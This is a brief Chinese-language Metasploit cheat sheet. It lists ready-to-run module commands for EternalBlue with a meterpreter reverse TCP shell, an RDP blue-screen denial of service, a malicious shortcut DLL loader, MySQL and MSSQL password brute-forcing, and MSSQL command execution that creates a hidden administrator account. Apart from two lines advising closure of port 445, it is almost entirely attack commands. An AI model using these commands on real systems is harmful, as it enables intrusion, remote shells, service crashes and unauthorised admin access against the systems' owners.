永恒之蓝(ms17-010):
[445端口开启]
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost ip run
防御:
关闭445端口smb服务(网络共享服务)
开启防火墙,设置445端口处的入站规则连接
蓝屏攻击(ms12-020):
[3389端口开启]
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set rhost ip run
文件共享(ms10-046):
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader set srvhost kaliip run
mysql暴力登录:
探测:
use auxiliary/scanner/mysql/mysql_version set rhosts ip run
登录:
use auxiliary/scanner/mysql/mysql_login set rhosts ip set pass_file password.txt set user_file user.txt run
mssql:
查找mssql端口:
use auxiliary/scanner/mssql/mssql_ping set rhost ip run
(也可以用nmap -sV ip,但是效果不行)
mssql暴力破解:
use auxiliary/scanner/mssql/mssql_login set rhost ip set pass_file password.txt set rport x run
mssql命令执行(添加账户):
use auxiliary/admin/mssql/mssql_exec set rhost ip set rport set cmd cmd.exe /c net user test 123 /add run set cmd cmd.exe /c net localgroup administrators test /add run